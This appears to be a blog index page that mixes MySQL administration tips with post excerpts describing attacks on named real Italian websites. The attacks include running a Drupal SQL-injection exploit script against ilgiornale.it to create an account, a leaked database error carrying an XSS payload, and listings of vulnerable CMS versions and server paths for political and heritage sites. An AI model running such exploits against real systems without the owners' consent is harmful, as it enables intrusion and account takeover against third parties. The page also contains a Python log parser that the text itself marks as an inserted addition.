
Posts

http://www.ilgiornale.it/ | sql injection, account creation

Drupal
SQL injection and account creation
python 34992 -t http://www.ilgiornale.it/ -u dop -p dop

We can raise an error to get more information:







PDOException: SQLSTATE[22001]: String data, right truncated: 1406 Data too long for column 'field_cap_value' at row 1: INSERT INTO {field_data_field_cap} (entity_type, entity_id, revision_id, bundle, delta, language, field_cap_value, field_cap_format) VALUES (:db_insert_placeholder_0, :db_insert_placeholder_1, :db_insert_placeholder_2, :db_insert_placeholder_3, :db_insert_placeholder_4, :db_insert_placeholder_5, :db_insert_placeholder_6, :db_insert_placeholder_7); Array ( [:db_insert_placeholder_0] => user [:db_insert_placeholder_1] => 140122 [:db_insert_placeholder_2] => 140122 [:db_insert_placeholder_3] => user [:db_insert_placeholder_4] => 0 [:db_insert_placeholder_5] => und [:db_insert_placeholder_6] => "><script>alert(1);</script><" [:db_ins…
Recent posts

[FIX] ERROR 1436 (HY000) Thread stack overrun - mysql 5.7

How to fix Thread stack overrun with MySQL 5.7 (and other versions)

Thread stack overrun with MySQL 5.7 on Linux and Windows
Run the server with:
mysqld --thread_stack=256k
To configure it in my.ini/my.cnf (server.cnf), add:

thread_stack = 256K


Further problems with MySQL on Windows
On 64-bit Windows you will probably need to give a bigger value.
I've been forced to use
thread_stack = 512K
on MySQL Ver 5.6.38 for Win64 on x86_64 (MySQL Community Server (GPL))






Generic errors with mysql_upgrade
ERROR 1436 (HY000) at line 1879: Thread stack overrun
ERROR 1436 (HY000) at line 1935

Use 'mysqld --thread_stack=#' to specify a bigger stack

How to log all the queries in MySQL or MariaDB - Windows and Linux

Log all your SQL queries on the MySQL server
Note: use this only on your test server, and without a lot of workload or connections; otherwise you are going to fill all your disk space or exhaust the I/O resources (and even raise the CPU load while waiting for I/O writes).

Make sure that your logs folder exists, and use the same folder as the other MySQL logs (e.g. /var/log/mysql/).

Add to your my.ini/my.cnf (or server.cnf):


On Windows:
general_log_file="C:/yourWindowsMysql/logs/logsql.log"
general_log=1

On Linux/Unix:
general_log_file="/var/log/mysqld-queries.log"
general_log=1

Then restart your MySQL or MariaDB server.
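Once the general log is enabled, the disk-space warning above can be checked against the log itself. The following is an added example (not from the original post): a small Python parser that assumes the MySQL 5.7 general-log line layout and reports how many statements and bytes each connection wrote. The sample log and the function names `parse_general_log` and `volume_by_connection` are constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in the MySQL 5.7 general-log layout (assumption):
# "<ISO timestamp>\t<connection id> <command>\t<argument>". Lines that do not
# start with a timestamp continue the previous entry (multi-line statements).
SAMPLE_LOG = """\
/usr/sbin/mysqld, Version: 5.7.20-log (MySQL Community Server (GPL)). started with:
Tcp port: 3306  Unix socket: /var/run/mysqld/mysqld.sock
Time                 Id Command    Argument
2017-11-20T10:15:30.100000Z\t    3 Connect\tapp@localhost on shop using Socket
2017-11-20T10:15:30.200000Z\t    3 Query\tSELECT id, name
FROM products
WHERE price > 10
2017-11-20T10:15:31.000000Z\t    4 Connect\treport@localhost on shop using Socket
2017-11-20T10:15:31.500000Z\t    4 Query\tSELECT COUNT(*) FROM orders
2017-11-20T10:15:32.000000Z\t    3 Quit\t
"""

ENTRY = re.compile(r"^(\d{4}-\d\d-\d\dT[\d:.]+Z)\t\s*(\d+) (\w[\w ]*?)(?:\t(.*))?$")

def parse_general_log(text):
    """Return entries as dicts; continuation lines are joined to their statement."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            ts, conn, cmd, arg = m.groups()
            entries.append({"time": ts, "conn": int(conn), "command": cmd, "argument": arg or ""})
        elif entries:  # header lines before the first entry are skipped
            entries[-1]["argument"] += "\n" + line
    return entries

def volume_by_connection(entries):
    """Count Query statements and logged argument bytes per connection id."""
    stats = defaultdict(lambda: {"queries": 0, "bytes": 0})
    for e in entries:
        s = stats[e["conn"]]
        s["bytes"] += len(e["argument"].encode())
        if e["command"] == "Query":
            s["queries"] += 1
    return dict(stats)

if __name__ == "__main__":
    for conn, s in sorted(volume_by_connection(parse_general_log(SAMPLE_LOG)).items()):
        print(f"connection {conn}: {s['queries']} queries, {s['bytes']} bytes logged")
```

Older MySQL releases and some MariaDB versions write a different timestamp format, so the `ENTRY` pattern needs adjusting for those logs.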



https://www.movimento5stelle.it again | several vulnerabilities, system compromise

Old vulnerabilities and other information. The main website shares the same problems with http://rousseau.movimento5stelle.it.

NOTE/Disclaimer: if you suppose you are voting in a safe manner (it's less safe than the cheapest Italian service provider with an old version of commonly used scripts, like WordPress or Joomla, installed by your "cousin") I can tell you without problems that you are wrong and you've been tricked by your own leaders. I'm not responsible for what they are saying and doing ... you are.
The server mostly hasn't been updated for years, except for just what they thought was worth updating.
Please, do not contact me for legal issues. I haven't saved/stored and I do not share any particular *confidential* information. I've nothing to do with any problem that you are facing on those websites.
No, I'm not "politically attacking" anybody. Those, that you are probably supposing, are political speculations from your respecti…

Reggia di caserta - SQL Injection, system compromise, xss, etc | http://www.reggiadicaserta.beniculturali.it

Joomla 1.5.15 (Vulnerable) http://www.reggiadicaserta.beniculturali.it
Archive.org: https://web.archive.org/web/20170426095201/http://reggiadicaserta.beniculturali.it:80/
They moved to: http://www.reggiadicaserta.beniculturali.it/Joomla/

path: /var/www/reggiadicaserta

They also have malware (search the source code for http://www.freepokermoney.net or similar URLs):

http://www.reggiadicaserta.beniculturali.it/Joomla/index.php?option=com_content&view=article&id=1434:codice-di-comportamento-dei-dipendenti-delle-pubbliche-amministrazioni&catid=212:organico-contatti&Itemid=886

Archived page: http://archive.is/3JJsi


WordPress 4.8.3 (with bogus plugin and theme) http://www.reggiadicaserta.beniculturali.it/wp/




The WordPress version is the "new" website, and they also "devastated" the already bad (with malware) SEO optimization by not redirecting URLs. I feel very sorry for that. What a mess.